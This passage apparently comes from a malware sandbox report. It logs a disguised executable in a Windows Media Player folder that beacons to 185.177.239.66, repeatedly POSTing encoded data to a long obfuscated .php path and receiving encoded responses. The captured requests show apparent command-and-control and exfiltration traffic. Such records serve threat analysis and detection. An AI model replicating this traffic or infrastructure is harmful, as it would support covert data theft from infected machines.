                                                                                        Jan 8, 2025 18:09:40.608678102 CET5007380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.698646069 CET8050073185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:40.749309063 CET5007380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.850022078 CET5007380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.850281954 CET5007480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.855012894 CET8050073185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:40.855135918 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:40.855209112 CET5007380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.855262041 CET5007480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.855360985 CET5007480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.860157013 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:41.202729940 CET5007480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:41.207681894 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:41.207699060 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:41.207709074 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:41.639919996 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:41.664629936 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:41.664729118 CET5007480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:41.795104980 CET5007480192.168.2.4185.177.239.66
Jan 8, 2025 18:09:41.795486927 CET | 50075 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:41.800172091 CET | 80 | 50074 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:41.800241947 CET | 50074 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:41.800282001 CET | 80 | 50075 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:41.800348043 CET | 50075 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:41.800441027 CET | 50075 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:41.805222988 CET | 80 | 50075 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:42.156336069 CET | 50075 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:42.161236048 CET | 80 | 50075 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:42.161248922 CET | 80 | 50075 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:42.161258936 CET | 80 | 50075 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:42.422188044 CET | 50076 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:42.427089930 CET | 80 | 50076 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:42.427301884 CET | 50076 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:42.427438974 CET | 50076 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:42.432256937 CET | 80 | 50076 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:42.483062029 CET | 80 | 50075 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:42.530544996 CET | 50075 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:42.614383936 CET | 80 | 50075 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:42.655529976 CET | 50075 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:43.116763115 CET | 80 | 50076 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:43.171159029 CET | 50076 | 80 | 192.168.2.4 | 185.177.239.66
• 185.177.239.66
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49955 | 185.177.239.66 | 80 | 8496 | C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:34.701864004 CET | 598 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Jan 8, 2025 18:08:35.341459036 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:35.453578949 CET | 344 | OUT | Data Raw: 00 01 01 01 03 0f 04 00 05 06 02 01 02 07 01 03 00 07 05 0f 02 04 03 0a 03 03 0f 04 04 50 03 57 0d 00 07 59 07 00 04 0b 0d 05 06 05 07 04 05 56 07 04 0e 5d 0d 50 01 01 01 0e 05 0d 07 00 07 08 03 02 0a 0b 05 04 04 06 0d 0e 0d 06 0d 54 0f 02 04 0c
Data Ascii: PWYV]PT^_WQV\L~A~pvc\iweRhBeL`o|Bhc]XoRczpr}l`^t~e~V@Ax}f}ry
Jan 8, 2025 18:08:35.782965899 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:08:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 35 36 34 0d 0a 56 4a 7e 4d 7b 54 6b 06 7b 71 64 03 7f 71 51 44 7d 77 6f 42 6b 73 62 52 79 60 68 4f 6a 62 52 03 76 60 66 50 7b 71 75 4a 77 65 74 4a 69 5b 78 01 55 4b 71 0c 60 5c 5e 5a 6b 4c 5b 04 7c 77 71 51 78 58 52 0a 7d 05 63 04 75 72 79 03 77 5f 69 47 68 4f 7a 00 7d 7c 67 54 6a 5e 7f 49 77 66 7b 06 7c 5c 7a 59 7e 60 69 03 6c 77 77 58 78 77 74 42 6c 6d 6b 49 79 4c 51 59 78 5a 62 06 6b 59 70 00 78 49 78 07 7c 71 7f 40 61 5f 63 5b 7a 51 41 5b 7d 67 59 53 68 5f 71 4e 61 6f 68 07 78 7f 68 04 76 63 62 4e 6e 72 66 5d 69 7c 76 05 7a 61 6a 05 76 73 6c 59 75 71 73 5c 63 62 72 50 7e 5d 7a 06 77 4c 6d 01 76 65 68 09 68 6c 65 01 77 7c 73 5d 7f 5d 6f 5b 78 6c 5d 03 6f 70 65 5b 7c 6d 74 08 74 67 6c 04 7e 62 5b 50 7e 7e 78 51 6f 7d 6e 4c 7e 72 7d 06 7b 5d 46 51 7c 0a 73 54 7e 60 73 55 7e 67 61 5f 7b 6e 6b 01 78 5c 64 01 7c 5f 77 02 6a 49 5e 50 7f 70 65 0d 7a 4d 5d 5d 6a 62 70 49 63 5d 75 51 7b 5c 79 00 77 76 5a 01 7e 48 7c 4e 7e 58 5b 0a 74 5c 63 4a 7c 72 53 07 7c 59 54 40 78 76 60 4f 7d 5d 77 4a 75 72 6d 07 77 [TRUNCATED]
Data Ascii: 564VJ~M{Tk{qdqQD}woBksbRy`hOjbRv`fP{quJwetJi[xUKq`\^ZkL[|wqQxXR}curyw_iGhOz}|gTj^Iwf{|\zY~`ilwwXxwtBlmkIyLQYxZbkYpxIx|q@a_c[zQA[}gYSh_qNaohxhvcbNnrf]i|vzajvslYuqs\cbrP~]zwLmvehhlew|s]]o[xl]ope[|mttgl~b[P~~xQo}nL~r}{]FQ|sT~`sU~ga_{nkx\d|_wjI^PpezM]]jbpIc]uQ{\ywvZ~H|N~X[t\cJ|rS|YT@xv`O}]wJurmwaS~aT|`}IsvOkJ{LS}pqygZygxO{Sgz\xHxsrO|NhxI|D}bwvOp~R|gVOOmuRRxlRwNTz_m}lvLzaTu]ovORAvan`Twb}ueR||SMv|t|sly|g{^TIC^NtwxL}Lz}moA{SzN}L[|ptBpA`p~wr{SQybZ~qUI}Yg@~`iBy]^L~\VtM}@yaaKuvZ~Xt@}vawrKbaM|Yb{f|A}cwvbyLtaq|_v}|dNwsvqU{LyJ|`[xw`xghx}z\tHx]v{]NZxYgY}L]aOoY||cH}g`|nUb|Axo|wNPNn_z]jU~_z\y\}b`g{ZL~Jx^Twbmvep|RW`th]{Yy|gosuX|}oPtIZj\zzSYQV~ERpr_kETVp{@RTPy`oaxln{gSX^ik|BhcGQxtpjrlFcZa{q}uuc^}f`vuc\Qbr^|wuQ{H]Q}^{]OrXcbGS}e_Qo_S^dK\bdJQuqz^_Fxw`A{gpOzSwxe|B|ZSZP{@RdQCQZ]YmgzRY[f^g{sXO[UJ_y{{_ccNV}b^RoPVXe_Y`Fq_Z_mXaxr_AZ[K\trsVkoB[po[P`UUU`\TcFcRc`py]bzPAQoa [TRUNCATED]
Jan 8, 2025 18:08:35.782985926 CET | 342 | IN | Data Raw: 4d 79 4b 7d 5a 5d 59 52 05 77 42 5d 60 54 48 56 59 09 59 5a 01 67 47 57 7a 7b 02 61 00 01 53 63 65 7b 05 7b 5a 66 61 7b 5a 44 50 6c 00 6f 4e 50 70 4a 01 62 04 54 43 61 07 76 46 55 62 06 01 53 56 59 76 69 64 03 5f 71 5f 5d 59 63 61 0d 40 57 73 6e
Data Ascii: MyK}Z]YRwB]`THVYYZgGWz{aSce{{Zfa{ZDPloNPpJbTCavFUbSVYvid_q_]Yca@WsnXuwokkYU@{B~[Q]WuEVc]CT_YQYb\QVdvPcT{_[PlS|_y{{_ccNV}b^RoPlD\pZFbbmXqMkgzp]C[_kWx}vAc`sEh|Zz{|\ocDPqoWXdPRqqRado~b__ywlpCy]FQiaBV~J
Jan 8, 2025 18:08:37.079519987 CET | 574 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 384
Expect: 100-continue
Jan 8, 2025 18:08:37.291210890 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:37.291423082 CET | 384 | OUT | Data Raw: 5c 5d 43 5e 5b 59 57 5f 5e 5c 50 55 50 5c 5a 58 5a 5d 5b 5d 54 52 55 59 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: \]C^[YW_^\PUP\ZXZ][]TRUYTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:)1>$140&'>963=4><(=.>V'":#%<,Z/=.Y#,Z!3
Jan 8, 2025 18:08:37.505700111 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:08:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 39 38 0d 0a 0f 12 3a 06 27 2b 2e 01 23 16 0b 0e 39 3e 3f 03 30 11 29 5d 3e 09 28 04 29 33 28 07 2b 15 0e 59 2b 3b 3e 01 30 02 25 5b 22 12 36 04 22 2a 2c 5f 02 12 26 40 28 0b 23 08 29 3f 0a 05 2b 27 0f 5e 23 22 0c 5d 3f 33 21 09 36 07 23 06 24 30 3a 54 24 1f 3f 54 3f 00 0a 01 38 3d 2d 5e 21 13 21 50 0c 12 23 0a 35 3b 27 0d 21 06 17 5e 29 3b 3a 5e 24 25 21 0f 26 17 2b 13 20 55 2b 54 24 20 34 14 24 28 34 1e 27 28 09 12 24 39 02 19 39 38 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
Data Ascii: 98:'+.#9>?0)]>()3(+Y+;>0%["6"*,_&@(#)?+'^#"]?3!6#$0:T$?T?8=-^!!P#5;'!^);:^$%!&+ U+T$ 4$(4'($998 S"-S0UQ0
Jan 8, 2025 18:08:37.823250055 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 1636
Expect: 100-continue
Jan 8, 2025 18:08:38.040121078 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:38.057806015 CET | 1636 | OUT | Data Raw: 59 5a 43 5b 5b 59 52 5c 5e 5c 50 55 50 59 5a 5d 5a 58 5b 5c 54 5c 55 59 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: YZC[[YR\^\PUPYZ]ZX[\T\UYTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9)!%0#$/=-X%-()Y;>>"Q3=.<$Z$+..Y#,Z!7
Jan 8, 2025 18:08:38.272903919 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:08:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 39 38 0d 0a 0f 12 39 5b 25 3b 21 58 20 06 00 55 39 04 20 59 33 3c 32 07 3d 09 37 5c 2a 1d 0a 02 3f 38 38 59 3c 05 22 01 27 2f 31 59 36 02 0f 58 23 2a 2c 5f 02 12 26 44 3c 21 28 51 3d 3c 27 12 2a 27 31 59 23 0c 3d 05 3f 30 21 0a 22 2a 38 1a 32 0d 3e 50 33 31 3c 0b 3c 3e 2b 14 2e 3e 21 10 22 13 21 50 0c 12 20 19 22 38 28 54 21 3b 2a 06 3f 3b 21 02 25 25 25 0d 31 17 02 06 20 20 20 0b 30 23 06 52 32 06 3b 0e 24 3b 34 00 32 00 3c 51 3a 02 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
Data Ascii: 989[%;!X U9 Y3<2=7\*?88Y<"'/1Y6X#*,_&D<!(Q=<'*'1Y#=?0!"*82>P31<<>+.>!"!P "8(T!;*?;!%%%1 0#R2;$;42<Q: S"-S0UQ0
Jan 8, 2025 18:08:38.328814983 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:08:38.556648016 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:38.556838989 CET | 2596 | OUT | Data Raw: 59 5b 43 5f 5e 58 57 5d 5e 5c 50 55 50 5a 5a 5d 5a 53 5b 5f 54 5c 55 58 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: Y[C_^XW]^\PUPZZ]ZS[_T\UXTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9+1-%2#$<Z(9*$-$T>Y+P>>3>1:Y?%<<9=.Y#,Z!+
Jan 8, 2025 18:08:38.887375116 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:08:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49971 | 185.177.239.66 | 80 | 8496 | C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:37.204824924 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:08:37.562119961 CET | 2596 | OUT | Data Raw: 5c 5d 43 53 5b 58 57 50 5e 5c 50 55 50 58 5a 5c 5a 5c 5b 5f 54 51 55 5f 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: \]CS[XWP^\PUPXZ\Z\[_TQU_TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9*6$(Z'53):5\07)*X106R:4^0 -.Y#,Z!#
Jan 8, 2025 18:08:37.921550035 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:38.057146072 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:08:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49984 | 185.177.239.66 | 80 | 8496 | C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:39.201363087 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:08:39.547476053 CET | 2596 | OUT | Data Raw: 59 52 43 58 5b 54 52 5a 5e 5c 50 55 50 5c 5a 59 5a 58 5b 55 54 51 55 5c 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: YRCX[TRZ^\PUP\ZYZX[UTQU\TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:+2.$1'350\*9-X%.;=< (.2P3.:S,<'0?39=.Y#,Z!3
Jan 8, 2025 18:08:39.928656101 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:40.062542915 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:08:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49993 | 185.177.239.66 | 80 | 8496 | C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:40.267009020 CET | 599 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Connection: Keep-Alive
Jan 8, 2025 18:08:40.608922005 CET | 2596 | OUT | Data Raw: 5c 59 43 5d 5b 55 57 5c 5e 5c 50 55 50 5e 5a 59 5a 5c 5b 59 54 53 55 5a 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: \YC][UW\^\PUP^ZYZ\[YTSUZTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=1-'2<^'\)5Z0= ) (=1'[&.Y($#.=.Y#,Z!
Jan 8, 2025 18:08:40.954989910 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:41.092442989 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:08:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 50002 | 185.177.239.66 | 80 | 8496 | C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:41.408210993 CET | 599 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2592
Expect: 100-continue
Connection: Keep-Alive
Jan 8, 2025 18:08:41.764998913 CET | 2592 | OUT | Data Raw: 59 5b 43 5e 5e 5a 52 5f 5e 5c 50 55 50 59 5a 5e 5a 5c 5b 5b 54 52 55 5e 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: Y[C^^ZR_^\PUPYZ^Z\[[TRU^TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9>"$'0 [)%Z3?)(*13%-7'?:=.Y#,Z!
Jan 8, 2025 18:08:42.095225096 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:42.227199078 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:08:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 50008 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:42.373147964 CET | 599 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 185.177.239.66
    Content-Length: 2596
    Expect: 100-continue
    Connection: Keep-Alive
Jan 8, 2025 18:08:42.718717098 CET | 2596 | OUT | Data Raw: 59 53 43 59 5b 55 57 5c 5e 5c 50 55 50 5a 5a 5c 5a 5a 5b 5b 54 56 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
